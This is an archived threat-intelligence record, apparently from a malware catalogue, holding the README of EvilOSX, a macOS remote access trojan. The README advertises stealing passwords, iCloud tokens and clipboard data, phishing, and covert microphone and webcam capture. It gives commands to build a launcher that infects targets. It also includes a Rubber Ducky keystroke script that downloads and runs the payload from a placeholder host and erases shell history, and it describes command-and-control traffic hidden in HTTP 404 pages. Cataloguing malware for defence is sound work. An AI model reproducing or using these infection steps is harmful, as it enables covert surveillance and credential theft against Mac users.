{
	"id": "909e38f8-a125-402b-b1da-5cd43474a465",
	"created_at": "2026-04-06T00:13:27.839064Z",
	"updated_at": "2026-04-10T13:12:12.552946Z",
	"deleted_at": null,
	"sha1_hash": "b2120a5554cbd412408f7c79fc3a11b16f249eff",
	"title": "GitHub - Marten4n6/EvilOSX: An evil RAT (Remote Administration Tool) for macOS / OS X.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 134871,
	"plain_text": "GitHub - Marten4n6/EvilOSX: An evil RAT (Remote\r\nAdministration Tool) for macOS / OS X.\r\nBy Marten4n6\r\nArchived: 2026-04-05 14:03:15 UTC\r\nAn evil RAT (Remote Administration Tool) for macOS / OS X.\r\nlicense GPLv3\r\n python 2.7, 3.7 issues 42 open 404 bbaaddggee nnoott ffoouunndd contributions welcome\r\nMarco Generator by Cedric Owens\r\nThis project is no longer active\r\nFeatures\r\nEmulate a terminal instance\r\nSimple extendable module system\r\nNo bot dependencies (pure python)\r\nUndetected by anti-virus (OpenSSL AES-256 encrypted payloads)\r\nPersistent\r\nGUI and CLI support\r\nRetrieve Chrome passwords\r\nRetrieve iCloud tokens and contacts\r\nRetrieve/monitor the clipboard\r\nRetrieve browser history (Chrome and Safari)\r\nPhish for iCloud passwords via iTunes\r\niTunes (iOS) backup enumeration\r\nRecord the microphone\r\nTake a desktop screenshot or picture using the webcam\r\nAttempt to get root via local privilege escalation\r\nHow To Use\r\n# Clone or download this repository\r\n$ git clone https://github.com/Marten4n6/EvilOSX\r\n# Go into the repository\r\n$ cd EvilOSX\r\nhttps://github.com/Marten4n6/EvilOSX\r\nPage 1 of 5\n\n# Install dependencies required by the server\r\n$ sudo pip install -r requirements.txt\r\n# Start the GUI\r\n$ python start.py\r\n# Lastly, run a built launcher on your target(s)\r\nWarning: Because payloads are created unique to the target system (automatically by the server), the server must\r\nbe running when any bot connects for the first time.\r\nAdvanced users\r\nThere's also a CLI for those who want to use this over SSH:\r\n# Create a launcher to infect your target(s)\r\n$ python start.py --builder\r\n# Start the CLI\r\n$ python start.py --cli --port 1337\r\n# Lastly, run a built launcher on your target(s)\r\nScreenshots\r\nhttps://github.com/Marten4n6/EvilOSX\r\nPage 2 of 5\n\nhttps://github.com/Marten4n6/EvilOSX\r\nPage 3 of 5\n\nMotivation\r\nThis project was created to be used with my Rubber Ducky, here's the simple script:\r\nREM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX\r\nREM See also: https://ducktoolkit.com/vidpid/\r\nDELAY 1000\r\nGUI SPACE\r\nDELAY 500\r\nSTRING Termina\r\nDELAY 1000\r\nENTER\r\nDELAY 1500\r\nREM Kill all terminals after x seconds\r\nSTRING screen -dm bash -c 'sleep 6; killall Terminal'\r\nENTER\r\nSTRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear\r\nENTER\r\nIt takes about 10 seconds to backdoor any unlocked Mac, which is...... nice\r\nTerminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise.\r\nTo bypass the keyboard setup assistant make sure you change the VID\u0026PID which can be found here.\r\nAluminum Keyboard (ISO) is probably the one you are looking for.\r\nVersioning\r\nEvilOSX will be maintained under the Semantic Versioning guidelines as much as possible.\r\nServer and bot releases will be numbered with the follow format:\r\nAnd constructed with the following guidelines:\r\nBreaking backward compatibility (with older bots) bumps the major\r\nNew additions without breaking backward compatibility bumps the minor\r\nBug fixes and misc changes bump the patch\r\nFor more information on SemVer, please visit https://semver.org/.\r\nDesign Notes\r\nInfecting a machine is split up into three parts:\r\nA launcher is run on the target machine whose only goal is to run the stager\r\nThe stager asks the server for a loader which handles how a payload will be loaded\r\nhttps://github.com/Marten4n6/EvilOSX\r\nPage 4 of 5\n\nThe loader is given a uniquely encrypted payload and then sent back to the stager\r\nThe server hides it's communications by sending messages hidden in HTTP 404 error pages (from\r\nBlackHat's \"Hiding In Plain Sight\")\r\nCommand requests are retrieved from the server via a GET request\r\nCommand responses are sent to the server via a POST request\r\nModules take advantage of python's dynamic nature, they are simply sent over the network compressed\r\nwith zlib, along with any configuration options\r\nSince the bot only communicates with the server and never the other way around, the server has no way of\r\nknowing when a bot goes offline\r\nIssues\r\nFeel free to submit any issues or feature requests here.\r\nContributing\r\nFor a simple guide on how to create modules click here.\r\nCredits\r\nThe awesome Empire project\r\nShoutout to Patrick Wardle for his awesome talks, check out Objective-See\r\nmanwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts\r\n(now deleted... let me know if you reappear)\r\nThe slowloris module is pretty much copied from PySlowLoris\r\nurwid and this code which saved me a lot of time with the CLI\r\nLogo created by motusora\r\nLicense\r\nGPLv3\r\nSource: https://github.com/Marten4n6/EvilOSX\r\nhttps://github.com/Marten4n6/EvilOSX\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/Marten4n6/EvilOSX"
	],
	"report_names": [
		"EvilOSX"
	],
	"threat_actors": [],
	"ts_created_at": 1775434407,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b2120a5554cbd412408f7c79fc3a11b16f249eff.pdf",
		"text": "https://archive.orkl.eu/b2120a5554cbd412408f7c79fc3a11b16f249eff.txt",
		"img": "https://archive.orkl.eu/b2120a5554cbd412408f7c79fc3a11b16f249eff.jpg"
	}
}